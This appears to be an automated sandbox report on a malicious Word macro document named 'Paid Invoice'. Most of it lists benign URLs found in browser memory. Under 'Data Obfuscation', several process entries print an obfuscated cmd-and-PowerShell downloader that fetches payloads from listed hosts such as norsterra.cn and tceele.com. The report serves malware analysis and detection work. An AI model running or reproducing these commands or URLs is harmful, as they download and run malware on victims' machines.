Source: iexplore.exeString found in binary or memory: http://search.goo.ne.jp/
Source: iexplore.exeString found in binary or memory: http://search.goo.ne.jp/favicon.ico
Source: iexplore.exeString found in binary or memory: http://search.hanafos.com/
Source: iexplore.exeString found in binary or memory: http://search.hanafos.com/favicon.ico
Source: iexplore.exeString found in binary or memory: http://search.interpark.com/
Source: iexplore.exeString found in binary or memory: http://search.ipop.co.kr/
Source: iexplore.exeString found in binary or memory: http://search.ipop.co.kr/favicon.ico
Source: iexplore.exeString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
Source: iexplore.exeString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
Source: iexplore.exeString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
Source: iexplore.exeString found in binary or memory: http://search.live.com/results.aspx?q=
Source: iexplore.exeString found in binary or memory: http://search.livedoor.com/
Source: iexplore.exeString found in binary or memory: http://search.livedoor.com/favicon.ico
Source: iexplore.exeString found in binary or memory: http://search.lycos.co.uk/
Source: iexplore.exeString found in binary or memory: http://search.lycos.com/
Source: iexplore.exeString found in binary or memory: http://search.lycos.com/favicon.ico
Source: iexplore.exeString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
Source: iexplore.exeString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
Source: iexplore.exeString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
Source: iexplore.exeString found in binary or memory: http://search.msn.com/results.aspx?q=
Source: iexplore.exeString found in binary or memory: http://search.nate.com/
Source: iexplore.exeString found in binary or memory: http://search.naver.com/
Source: iexplore.exeString found in binary or memory: http://search.naver.com/favicon.ico
Source: iexplore.exeString found in binary or memory: http://search.nifty.com/
Source: iexplore.exeString found in binary or memory: http://search.orange.co.uk/
Source: iexplore.exeString found in binary or memory: http://search.orange.co.uk/favicon.ico
Source: iexplore.exeString found in binary or memory: http://search.rediff.com/
Source: iexplore.exeString found in binary or memory: http://search.rediff.com/favicon.ico
Source: iexplore.exeString found in binary or memory: http://search.seznam.cz/
Source: iexplore.exeString found in binary or memory: http://search.seznam.cz/favicon.ico
Source: iexplore.exeString found in binary or memory: http://search.sify.com/
Source: iexplore.exeString found in binary or memory: http://search.yahoo.co.jp
Source: iexplore.exeString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
Source: iexplore.exeString found in binary or memory: http://search.yahoo.com/
Source: iexplore.exeString found in binary or memory: http://search.yahoo.com/favicon.ico
Source: iexplore.exeString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
Source: iexplore.exe | String found in binary or memory: http://search.yam.com/
Source: iexplore.exe | String found in binary or memory: http://search1.taobao.com/
Source: iexplore.exe | String found in binary or memory: http://search2.estadao.com.br/
Source: iexplore.exe | String found in binary or memory: http://searchresults.news.com.au/
Source: iexplore.exe | String found in binary or memory: http://service2.bfast.com/
Source: iexplore.exe | String found in binary or memory: http://si.wikipedia.org/
Source: iexplore.exe | String found in binary or memory: http://si.wikipedia.org/favicon.ico
Source: iexplore.exe | String found in binary or memory: http://si.wikipedia.org/w/api.php?action=opensearch&amp;format=xml&amp;search=
Source: iexplore.exe | String found in binary or memory: http://sitesearch.timesonline.co.uk/
Source: iexplore.exe | String found in binary or memory: http://so-net.search.goo.ne.jp/
Source: iexplore.exe | String found in binary or memory: http://suche.aol.de/
Source: iexplore.exe | String found in binary or memory: http://suche.freenet.de/
Source: iexplore.exe | String found in binary or memory: http://suche.freenet.de/favicon.ico
Source: iexplore.exe | String found in binary or memory: http://suche.lycos.de/
Source: iexplore.exe | String found in binary or memory: http://suche.t-online.de/
Source: iexplore.exe | String found in binary or memory: http://suche.web.de/
Source: iexplore.exe | String found in binary or memory: http://suche.web.de/favicon.ico
Source: powershell.exe | String found in binary or memory: http://tceele.com/NCbJ/
Source: iexplore.exe | String found in binary or memory: http://treyresearch.net
Source: iexplore.exe | String found in binary or memory: http://tw.search.yahoo.com/
Source: iexplore.exe | String found in binary or memory: http://udn.com/
Source: iexplore.exe | String found in binary or memory: http://udn.com/favicon.ico
Source: iexplore.exe | String found in binary or memory: http://uk.ask.com/
Source: iexplore.exe | String found in binary or memory: http://uk.ask.com/favicon.ico
Source: iexplore.exe | String found in binary or memory: http://uk.search.yahoo.com/
Source: iexplore.exe | String found in binary or memory: http://vachercher.lycos.fr/
Source: iexplore.exe | String found in binary or memory: http://video.globo.com/
Source: iexplore.exe | String found in binary or memory: http://video.globo.com/favicon.ico
Source: WINWORD.EXE | String found in binary or memory: http://w
Source: iexplore.exe | String found in binary or memory: http://web.ask.com/
Source: iexplore.exe | String found in binary or memory: http://www.%s.com
Source: iexplore.exe | String found in binary or memory: http://www.abril.com.br/
Source: iexplore.exe | String found in binary or memory: http://www.abril.com.br/favicon.ico
Source: iexplore.exe | String found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
Source: iexplore.exe | String found in binary or memory: http://www.alarabiya.net/
Source: iexplore.exe | String found in binary or memory: http://www.alarabiya.net/favicon.ico
Source: iexplore.exe | String found in binary or memory: http://www.amazon.co.jp/
Source: iexplore.exe | String found in binary or memory: http://www.amazon.co.uk/
Source: iexplore.exe | String found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
Source: iexplore.exe | String found in binary or memory: http://www.amazon.com/favicon.ico
Source: iexplore.exe | String found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
Source: iexplore.exe | String found in binary or memory: http://www.amazon.de/
Source: iexplore.exe | String found in binary or memory: http://www.aol.com/favicon.ico
Source: iexplore.exe | String found in binary or memory: http://www.arrakis.com/
Source: iexplore.exe | String found in binary or memory: http://www.arrakis.com/favicon.ico
Source: iexplore.exe | String found in binary or memory: http://www.asharqalawsat.com/
Source: iexplore.exe | String found in binary or memory: http://www.asharqalawsat.com/favicon.ico
Source: iexplore.exe | String found in binary or memory: http://www.ask.com/
Source: iexplore.exe | String found in binary or memory: http://www.auction.co.kr/auction.ico
Source: iexplore.exe | String found in binary or memory: http://www.baidu.com/
Source: iexplore.exe | String found in binary or memory: http://www.baidu.com/favicon.ico
Source: iexplore.exe, iecompatdata.xml.0.dr, iecompatviewlist[1].xml.0.dr | String found in binary or memory: http://www.bing.com/bingbot.htm)
Source: iexplore.exe | String found in binary or memory: http://www.bing.com/bingbot.htm)D
Source: iexplore.exe | String found in binary or memory: http://www.bing.com/favicon.ico
Source: iexplore.exe | String found in binary or memory: http://www.bing.com/favicon.icoA33DD
Source: iexplore.exe | String found in binary or memory: http://www.bing.com/favicon.icoLinkID=403856&language=
Source: iexplore.exe | String found in binary or memory: http://www.bing.com/favicon.icoa
Source: iexplore.exe | String found in binary or memory: http://www.bing.com/favicon.icoj
Source: iexplore.exe | String found in binary or memory: http://www.bing.com/maps/
Source: iexplore.exe | String found in binary or memory: http://www.bing.com/maps/default.aspx
Source: iexplore.exe | String found in binary or memory: http://www.bing.com/maps/geotager.aspx
Source: iexplore.exe | String found in binary or memory: http://www.bing.com/safety/warning
Source: iexplore.exe | String found in binary or memory: http://www.bing.com/search?q=
Source: iexplore.exe | String found in binary or memory: http://www.bing.com/search?q=%7BsearchTerms%7D&src=IE-SearchBox&FORM=IESR02b
Source: iexplore.exe | String found in binary or memory: http://www.bing.com/search?q=&src=IE-SearchBox&FORM=IENTSRguage
Source: iexplore.exe | String found in binary or memory: http://www.cdiscount.com/
Source: iexplore.exe | String found in binary or memory: http://www.cdiscount.com/favicon.ico
Source: iexplore.exe | String found in binary or memory: http://www.ceneo.pl/
Source: iexplore.exe | String found in binary or memory: http://www.ceneo.pl/favicon.ico
Source: iexplore.exe | String found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
Source: iexplore.exe | String found in binary or memory: http://www.cjmall.com/
Source: iexplore.exe | String found in binary or memory: http://www.cjmall.com/favicon.ico
Source: iexplore.exe | String found in binary or memory: http://www.clarin.com/favicon.ico
Source: iexplore.exe | String found in binary or memory: http://www.cnet.co.uk/
Source: iexplore.exe | String found in binary or memory: http://www.cnet.com/favicon.ico
Source: iexplore.exe | String found in binary or memory: http://www.dailymail.co.uk/
Source: iexplore.exe | String found in binary or memory: http://www.dailymail.co.uk/favicon.ico
Source: iexplore.exe | String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: iexplore.exe | String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: iexplore.exe | String found in binary or memory: http://www.etmall.com.tw/
Source: iexplore.exe | String found in binary or memory: http://www.etmall.com.tw/favicon.ico
Source: iexplore.exe | String found in binary or memory: http://www.excite.co.jp/
Source: iexplore.exe | String found in binary or memory: http://www.expedia.com/
Source: iexplore.exe | String found in binary or memory: http://www.expedia.com/favicon.ico
Source: iexplore.exe | String found in binary or memory: http://www.facebook.com/
Source: iexplore.exe | String found in binary or memory: http://www.facebook.com/favicon.ico
Source: iexplore.exe | String found in binary or memory: http://www.gismeteo.ru/favicon.ico
Source: iexplore.exe | String found in binary or memory: http://www.gmarket.co.kr/
Source: iexplore.exe | String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
Source: iexplore.exe | String found in binary or memory: http://www.google.co.in/
Source: iexplore.exe | String found in binary or memory: http://www.google.co.jp/
Source: iexplore.exe | String found in binary or memory: http://www.google.co.uk/
Source: iexplore.exe | String found in binary or memory: http://www.google.com.br/
Source: iexplore.exe | String found in binary or memory: http://www.google.com.sa/
Source: iexplore.exe | String found in binary or memory: http://www.google.com.tw/
Source: iexplore.exe | String found in binary or memory: http://www.google.com/
Source: iexplore.exe | String found in binary or memory: http://www.google.com/favicon.ico
Source: iexplore.exe | String found in binary or memory: http://www.google.cz/
Source: iexplore.exe | String found in binary or memory: http://www.google.de/
Source: iexplore.exe | String found in binary or memory: http://www.google.es/
Source: iexplore.exe | String found in binary or memory: http://www.google.fr/
Source: iexplore.exe | String found in binary or memory: http://www.google.it/
Source: iexplore.exe | String found in binary or memory: http://www.google.pl/
Source: iexplore.exe | String found in binary or memory: http://www.google.ru/
Source: iexplore.exe | String found in binary or memory: http://www.google.si/
Source: iexplore.exe | String found in binary or memory: http://www.iask.com/
Source: iexplore.exe | String found in binary or memory: http://www.iask.com/favicon.ico
Source: iexplore.exe | String found in binary or memory: http://www.kkbox.com.tw/
Source: iexplore.exe | String found in binary or memory: http://www.kkbox.com.tw/favicon.ico
Source: iexplore.exe | String found in binary or memory: http://www.linternaute.com/favicon.ico
Source: iexplore.exe | String found in binary or memory: http://www.maktoob.com/favicon.ico
Source: iexplore.exe | String found in binary or memory: http://www.mercadolibre.com.mx/
Source: iexplore.exe | String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
Source: iexplore.exe | String found in binary or memory: http://www.mercadolivre.com.br/
Source: iexplore.exe | String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
Source: iexplore.exe | String found in binary or memory: http://www.merlin.com.pl/
Source: iexplore.exe | String found in binary or memory: http://www.merlin.com.pl/favicon.ico
Source: iexplore.exe | String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
Source: iexplore.exe | String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
Source: iexplore.exe | String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
Source: iexplore.exe | String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
Source: iexplore.exe | String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
Source: iexplore.exe | String found in binary or memory: http://www.mtv.com/
Source: iexplore.exe | String found in binary or memory: http://www.mtv.com/favicon.ico
Source: iexplore.exe | String found in binary or memory: http://www.myspace.com/favicon.ico
Source: iexplore.exe | String found in binary or memory: http://www.najdi.si/
Source: iexplore.exe | String found in binary or memory: http://www.najdi.si/favicon.ico
Source: iexplore.exe | String found in binary or memory: http://www.nate.com/favicon.ico
Source: iexplore.exe | String found in binary or memory: http://www.neckermann.de/
Source: iexplore.exe | String found in binary or memory: http://www.neckermann.de/favicon.ico
Source: iexplore.exe | String found in binary or memory: http://www.news.com.au/favicon.ico
Source: iexplore.exe | String found in binary or memory: http://www.nifty.com/favicon.ico
Source: iexplore.exe | String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
Source: iexplore.exe | String found in binary or memory: http://www.orange.fr/
Source: iexplore.exe | String found in binary or memory: http://www.otto.de/favicon.ico
Source: iexplore.exe | String found in binary or memory: http://www.ozon.ru/
Source: iexplore.exe | String found in binary or memory: http://www.ozon.ru/favicon.ico
Source: iexplore.exe | String found in binary or memory: http://www.ozu.es/favicon.ico
Source: iexplore.exe | String found in binary or memory: http://www.paginasamarillas.es/
Source: iexplore.exe | String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
Source: iexplore.exe | String found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: iexplore.exe | String found in binary or memory: http://www.priceminister.com/
Source: iexplore.exe | String found in binary or memory: http://www.priceminister.com/favicon.ico
Source: iexplore.exe | String found in binary or memory: http://www.public-trust.com/CPS/OmniRoot.html0
Source: iexplore.exe | String found in binary or memory: http://www.public-trust.com/cgi-bin/CRL/2018/cdp.crl0
Source: iexplore.exe | String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: iexplore.exe | String found in binary or memory: http://www.rambler.ru/
Source: iexplore.exe | String found in binary or memory: http://www.rambler.ru/favicon.ico
Source: iexplore.exe | String found in binary or memory: http://www.recherche.aol.fr/
Source: iexplore.exe | String found in binary or memory: http://www.rtl.de/
Source: iexplore.exe | String found in binary or memory: http://www.rtl.de/favicon.ico
Source: iexplore.exe | String found in binary or memory: http://www.servicios.clarin.com/
Source: iexplore.exe | String found in binary or memory: http://www.shopzilla.com/
Source: iexplore.exe | String found in binary or memory: http://www.sify.com/favicon.ico
Source: iexplore.exe | String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
Source: iexplore.exe | String found in binary or memory: http://www.sogou.com/
Source: iexplore.exe | String found in binary or memory: http://www.sogou.com/favicon.ico
Source: iexplore.exe | String found in binary or memory: http://www.soso.com/
Source: iexplore.exe | String found in binary or memory: http://www.soso.com/favicon.ico
Source: iexplore.exe | String found in binary or memory: http://www.t-online.de/favicon.ico
Source: iexplore.exe | String found in binary or memory: http://www.taobao.com/
Source: iexplore.exe | String found in binary or memory: http://www.taobao.com/favicon.ico
Source: iexplore.exe | String found in binary or memory: http://www.target.com/
Source: iexplore.exe | String found in binary or memory: http://www.target.com/favicon.ico
Source: iexplore.exe | String found in binary or memory: http://www.tchibo.de/
Source: iexplore.exe | String found in binary or memory: http://www.tchibo.de/favicon.ico
Source: iexplore.exe | String found in binary or memory: http://www.tesco.com/
Source: iexplore.exe | String found in binary or memory: http://www.tesco.com/favicon.ico
Source: iexplore.exe | String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: iexplore.exe | String found in binary or memory: http://www.tiscali.it/favicon.ico
Source: powershell.exe | String found in binary or memory: http://www.umbriawifi.it/Ue8J/
Source: iexplore.exe | String found in binary or memory: http://www.univision.com/
Source: iexplore.exe | String found in binary or memory: http://www.univision.com/favicon.ico
Source: iexplore.exe | String found in binary or memory: http://www.usertrust.com1
Source: iexplore.exe | String found in binary or memory: http://www.walmart.com/
Source: iexplore.exe | String found in binary or memory: http://www.walmart.com/favicon.ico
Source: iexplore.exe | String found in binary or memory: http://www.weather.com/
Source: iexplore.exe | String found in binary or memory: http://www.weather.com/favicon.ico
Source: iexplore.exe | String found in binary or memory: http://www.ya.com/favicon.ico
Source: iexplore.exe | String found in binary or memory: http://www.yam.com/favicon.ico
Source: iexplore.exe | String found in binary or memory: http://www.yandex.ru/
Source: iexplore.exe | String found in binary or memory: http://www.yandex.ru/favicon.ico
Source: iexplore.exe | String found in binary or memory: http://www3.fnac.com/
Source: iexplore.exe | String found in binary or memory: http://www3.fnac.com/favicon.ico
Source: iexplore.exe | String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
Source: iexplore.exe | String found in binary or memory: http://yellowpages.superpages.com/
Source: iexplore.exe | String found in binary or memory: http://yellowpages.superpages.com/favicon.ico
Source: iexplore.exe | String found in binary or memory: http://z.about.com/m/a08.ico
Source: iexplore.exe | String found in binary or memory: https://
Source: iexplore.exe | String found in binary or memory: https://en.wikipedia.org/wiki/XSLT/Muenchian_grouping
Source: iexplore.exe | String found in binary or memory: https://example.com
Source: iexplore.exe | String found in binary or memory: https://secure.comodo.com/CPS0
Source: powershell.exe | String found in binary or memory: https://ww
Source: iexplore.exe | String found in binary or memory: https://www.bing.com/
Source: iexplore.exe | String found in binary or memory: https://www.bing.com/ah
Source: iexplore.exe | String found in binary or memory: https://www.bing.com/favicon.ico
Source: iexplore.exe | String found in binary or memory: https://www.bing.com/favicon.ico:0
Source: iexplore.exe | String found in binary or memory: https://www.digicert.com/CPS0
Source: iexplore.exe | String found in binary or memory: https://www.example.com.
Source: iexplore.exe | String found in binary or memory: https://www.mi
Source: iexplore.exe | String found in binary or memory: https://www.microso
Source: iexplore.exe | String found in binary or memory: https://www.msn.com/spartan/ientp?locale=en-US&market=US&enableregulatorypsm=0&NTLogo=1
Source: powershell.exe | String found in binary or memory: https://www.nor
Source: powershell.exe | String found in binary or memory: https://www.norX
Source: powershell.exe | String found in binary or memory: https://www.nors
Source: powershell.exe | String found in binary or memory: https://www.norst
Source: powershell.exe | String found in binary or memory: https://www.norste
Source: powershell.exe | String found in binary or memory: https://www.norsterra.cn
Source: powershell.exe | String found in binary or memory: https://www.norsterra.cn/EsD2/
Source: powershell.exe | String found in binary or memory: https://www.norsterra.cn/EsD2/8
Source: powershell.exe | String found in binary or memory: https://www.norsterra.cn/EsD2/?
Source: powershell.exe | String found in binary or memory: https://www.norsterra.cn/EsD2/?htt
Source: powershell.exe | String found in binary or memory: https://www.norsterra.cn/EsD2/?http:/
Source: powershell.exe | String found in binary or memory: https://www.norsterra.cn/EsD2/?http://tce
Source: powershell.exe | String found in binary or memory: https://www.norsterra.cn/EsD2/?http://tceele.com/NCbJ/?ht
Source: powershell.exe | String found in binary or memory: https://www.norsterra.cn/EsD2/?http://tceele.com/NCbJ/?http://a
Source: powershell.exe | String found in binary or memory: https://www.norsterra.cn/EsD2/?http://tceele.com/NCbJ/?http://ab
Source: powershell.exe | String found in binary or memory: https://www.norsterra.cn/EsD2/?http://tceele.com/NCbJ/?http://abou
Source: powershell.exe | String found in binary or memory: https://www.norsterra.cn/EsD2/?http://tceele.com/NCbJ/?http://about
Source: powershell.exe | String found in binary or memory: https://www.norsterra.cn/EsD2/?http://tceele.com/NCbJ/?http://about.megaxus
Source: powershell.exe | String found in binary or memory: https://www.norsterra.cn/EsD2/?http://tceele.com/NCbJ/?http://about.megaxus.
Source: powershell.exe | String found in binary or memory: https://www.norsterra.cn/EsD2/?http://tceele.com/NCbJ/?http://about.megaxus.com/v1/images/a
Source: powershell.exe | String found in binary or memory: https://www.norsterra.cn/EsD2/?http://tceele.com/NCbJ/?http://about.megaxus.com/v1/images/ar
Source: powershell.exe | String found in binary or memory: https://www.norsterra.cn/EsD2/?http://tceele.com/NCbJ/?http://about.megaxus.com/v1/images/artic
Source: powershell.exe | String found in binary or memory: https://www.norsterra.cn/EsD2/?http://tceele.com/NCbJ/?http://about.megaxus.com/v1/images/article
Source: powershell.exe | String found in binary or memory: https://www.norsterra.cn/EsD2/?http://tceele.com/NCbJ/?http://about.megaxus.com/v1/images/article/
Source: powershell.exe | String found in binary or memory: https://www.norsterra.cn/EsD2/?http://tceele.com/NCbJ/?http://about.megaxus.com/v1/images/article/Ip
Source: powershell.exe | String found in binary or memory: https://www.norsterra.cnx&Zk
Uses HTTPS
Source: unknown | Network traffic detected: HTTP traffic on port 49180 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49180
Social media urls found in memory data
Source: iexplore.exe | String found in binary or memory: http://www.facebook.com/
Source: iexplore.exe | String found in binary or memory: http://www.facebook.com/favicon.ico

Data Obfuscation:

Document contains an embedded VBA with many randomly named variables
Source: Paid Invoice[1].doc.1.dr | Stream path 'Macros/VBA/NTiRlViMWCoM' : High entropy of concatenated variable names
Source: Paid Invoice.doc.usc4tz8.partial.1.dr | Stream path 'Macros/VBA/NTiRlViMWCoM' : High entropy of concatenated variable names
Obfuscated command line found
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd uhdfgpo jas jjjsjjsjsdiuwqu ioqwu efdgdfgpoqw jdjska dhakjbhdbqwuiqwh hiqwoeqwpi poqw eqw & %C^om^S^p^Ec% /V /c set %wZvEfQF%=p^o^w^er&&set %dZbwmkEttUGV%=^sh^ell&&!%wZvEfQF%!!%dZbwmkEttUGV%! ' & ( $verbosEPrefErEnCe.tOsTRinG()[1,3]+'X'-jOIN'')((('((l5M (ngS((mngS+ngSgY'+'tL8nsadasd = &(EmgY+mgYnmgY+mgYynEny+EmgY'+'+mgY'+'nyeEny+l5M+l5MEl5M+l5Mnyw-obmgY+mgYjecEny+'+'EnmgY+'+'mg'+'YngS+ngSytEnmn'+'gS+ngSgY+m'+'gYy) ramgY+mgYnmgY+mgYdoml5M+l5M;mgY+'+'mgYtmgY+mgl5M+l5MYL8YmgY+mgYYmgY+mgYU = .(EnymgY+mgYneEngS+ngSny+mgY+mgYEnywmgYngS+ngS+mg'+'YEny+Eny-objmgYngS+ngS+mg'+'YectEnymgY+mg'+'Y) S'+'yl5M+l5MstengS+ngSm.Nl5M+l5Meml5M+l5M'+'gY+mgYt.WemgY+mgYbC'+'lienngS+l5M+l5MngSl5M+l5Mt;t'+'L8mgY+mgYNSB =l5M+l5M tL8mgY+mgYnsngS+ngSadasdmgY+mgY.mgY+mgYnext(10000mgY+l5M'+'+l5MmgY,l5M+l5MmgY+mgn'+'gS+ngS'+'Y 28mgY+m'+'ngS+ngSgY213mgY+mgY3);t'+'L8ngS+ngSADCmgY+mgYX =mgY+mg'+'Y mgY+mgYEnmgY+m'+'gYy '+'httng'+'l5M+'+'l5MS+ngSps:l5M+l5M/m'+'gY+mgYngS+ngS/w
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd uhdfgpo jas jjjsjjsjsdiuwqu ioqwu efdgdfgpoqw jdjska dhakjbhdbqwuiqwh hiqwoeqwpi poqw eqw & %C^om^S^p^Ec% /V /c set %wZvEfQF%=p^o^w^er&&set %dZbwmkEttUGV%=^sh^ell&&!%wZvEfQF%!!%dZbwmkEttUGV%! ' & ( $verbosEPrefErEnCe.tOsTRinG()[1,3]+'X'-jOIN'')((('((l5M (ngS((mngS+ngSgY'+'tL8nsadasd = &(EmgY+mgYnmgY+mgYynEny+EmgY'+'+mgY'+'nyeEny+l5M+l5MEl5M+l5Mnyw-obmgY+mgYjecEny+'+'EnmgY+'+'mg'+'YngS+ngSytEnmn'+'gS+ngSgY+m'+'gYy) ramgY+mgYnmgY+mgYdoml5M+l5M;mgY+'+'mgYtmgY+mgl5M+l5MYL8YmgY+mgYYmgY+mgYU = .(EnymgY+mgYneEngS+ngSny+mgY+mgYEnywmgYngS+ngS+mg'+'YEny+Eny-objmgYngS+ngS+mg'+'YectEnymgY+mg'+'Y) S'+'yl5M+l5MstengS+ngSm.Nl5M+l5Meml5M+l5M'+'gY+mgYt.WemgY+mgYbC'+'lienngS+l5M+l5MngSl5M+l5Mt;t'+'L8mgY+mgYNSB =l5M+l5M tL8mgY+mgYnsngS+ngSadasdmgY+mgY.mgY+mgYnext(10000mgY+l5M'+'+l5MmgY,l5M+l5MmgY+mgn'+'gS+ngS'+'Y 28mgY+m'+'ngS+ngSgY213mgY+mgY3);t'+'L8ngS+ngSADCmgY+mgYX =mgY+mg'+'Y mgY+mgYEnmgY+m'+'gYy '+'httng'+'l5M+'+'l5MS+ngSps:l5M+l5M/m'+'gY+mgYngS+ngS/w
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ' & ( $verbosEPrefErEnCe.tOsTRinG()[1,3]+'X'-jOIN'')((('((l5M (ngS((mngS+ngSgY'+'tL8nsadasd = &(EmgY+mgYnmgY+mgYynEny+EmgY'+'+mgY'+'nyeEny+l5M+l5MEl5M+l5Mnyw-obmgY+mgYjecEny+'+'EnmgY+'+'mg'+'YngS+ngSytEnmn'+'gS+ngSgY+m'+'gYy) ramgY+mgYnmgY+mgYdoml5M+l5M;mgY+'+'mgYtmgY+mgl5M+l5MYL8YmgY+mgYYmgY+mgYU = .(EnymgY+mgYneEngS+ngSny+mgY+mgYEnywmgYngS+ngS+mg'+'YEny+Eny-objmgYngS+ngS+mg'+'YectEnymgY+mg'+'Y) S'+'yl5M+l5MstengS+ngSm.Nl5M+l5Meml5M+l5M'+'gY+mgYt.WemgY+mgYbC'+'lienngS+l5M+l5MngSl5M+l5Mt;t'+'L8mgY+mgYNSB =l5M+l5M tL8mgY+mgYnsngS+ngSadasdmgY+mgY.mgY+mgYnext(10000mgY+l5M'+'+l5MmgY,l5M+l5MmgY+mgn'+'gS+ngS'+'Y 28mgY+m'+'ngS+ngSgY213mgY+mgY3);t'+'L8ngS+ngSADCmgY+mgYX =mgY+mg'+'Y mgY+mgYEnmgY+m'+'gYy '+'httng'+'l5M+'+'l5MS+ngSps:l5M+l5M/m'+'gY+mgYngS+ngS/wwmgY+mgYw.norsmgY+mgYtmg'+'Y+mgYemgY+mgYrra.cnmgY+mgY/EsD2/?httmgYl5M+l5M+nl5M+l5MgS+ngSmgYp:/mgY+mgY/tcemgY+mgYele.com/NCbJ'+'/?htmgY+mgYtp://al5M+l5MbmgY+mgYoul5M+l5MmgY+'+'mg'+'YtmgY+mgY.megax
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Windows\System32\cmd.exe cmd uhdfgpo jas jjjsjjsjsdiuwqu ioqwu efdgdfgpoqw jdjska dhakjbhdbqwuiqwh hiqwoeqwpi poqw eqw & %C^om^S^p^Ec% /V /c set %wZvEfQF%=p^o^w^er&&set %dZbwmkEttUGV%=^sh^ell&&!%wZvEfQF%!!%dZbwmkEttUGV%! ' & ( $verbosEPrefErEnCe.tOsTRinG()[1,3]+'X'-jOIN'')((('((l5M (ngS((mngS+ngSgY'+'tL8nsadasd = &(EmgY+mgYnmgY+mgYynEny+EmgY'+'+mgY'+'nyeEny+l5M+l5MEl5M+l5Mnyw-obmgY+mgYjecEny+'+'EnmgY+'+'mg'+'YngS+ngSytEnmn'+'gS+ngSgY+m'+'gYy) ramgY+mgYnmgY+mgYdoml5M+l5M;mgY+'+'mgYtmgY+mgl5M+l5MYL8YmgY+mgYYmgY+mgYU = .(EnymgY+mgYneEngS+ngSny+mgY+mgYEnywmgYngS+ngS+mg'+'YEny+Eny-objmgYngS+ngS+mg'+'YectEnymgY+mg'+'Y) S'+'yl5M+l5MstengS+ngSm.Nl5M+l5Meml5M+l5M'+'gY+mgYt.WemgY+mgYbC'+'lienngS+l5M+l5MngSl5M+l5Mt;t'+'L8mgY+mgYNSB =l5M+l5M tL8mgY+mgYnsngS+ngSadasdmgY+mgY.mgY+mgYnext(10000mgY+l5M'+'+l5MmgY,l5M+l5MmgY+mgn'+'gS+ngS'+'Y 28mgY+m'+'ngS+ngSgY213mgY+mgY3);t'+'L8ngS+ngSADCmgY+mgYX =mgY+mg'+'Y mgY+mgYEnmgY+m'+'gYy '+'httng'+'l5M+'+'l5MS+ngSps:l5M+l5M/m'+'gY+mgYngS+ngS/w
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Windows\System32\cmd.exe cmd uhdfgpo jas jjjsjjsjsdiuwqu ioqwu efdgdfgpoqw jdjska dhakjbhdbqwuiqwh hiqwoeqwpi poqw eqw & %C^om^S^p^Ec% /V /c set %wZvEfQF%=p^o^w^er&&set %dZbwmkEttUGV%=^sh^ell&&!%wZvEfQF%!!%dZbwmkEttUGV%! ' & ( $verbosEPrefErEnCe.tOsTRinG()[1,3]+'X'-jOIN'')((('((l5M (ngS((mngS+ngSgY'+'tL8nsadasd = &(EmgY+mgYnmgY+mgYynEny+EmgY'+'+mgY'+'nyeEny+l5M+l5MEl5M+l5Mnyw-obmgY+mgYjecEny+'+'EnmgY+'+'mg'+'YngS+ngSytEnmn'+'gS+ngSgY+m'+'gYy) ramgY+mgYnmgY+mgYdoml5M+l5M;mgY+'+'mgYtmgY+mgl5M+l5MYL8YmgY+mgYYmgY+mgYU = .(EnymgY+mgYneEngS+ngSny+mgY+mgYEnywmgYngS+ngS+mg'+'YEny+Eny-objmgYngS+ngS+mg'+'YectEnymgY+mg'+'Y) S'+'yl5M+l5MstengS+ngSm.Nl5M+l5Meml5M+l5M'+'gY+mgYt.WemgY+mgYbC'+'lienngS+l5M+l5MngSl5M+l5Mt;t'+'L8mgY+mgYNSB =l5M+l5M tL8mgY+mgYnsngS+ngSadasdmgY+mgY.mgY+mgYnext(10000mgY+l5M'+'+l5MmgY,l5M+l5MmgY+mgn'+'gS+ngS'+'Y 28mgY+m'+'ngS+ngSgY213mgY+mgY3);t'+'L8ngS+ngSADCmgY+mgYX =mgY+mg'+'Y mgY+mgYEnmgY+m'+'gYy '+'httng'+'l5M+'+'l5MS+ngSps:l5M+l5M/m'+'gY+mgYngS+ngS/w
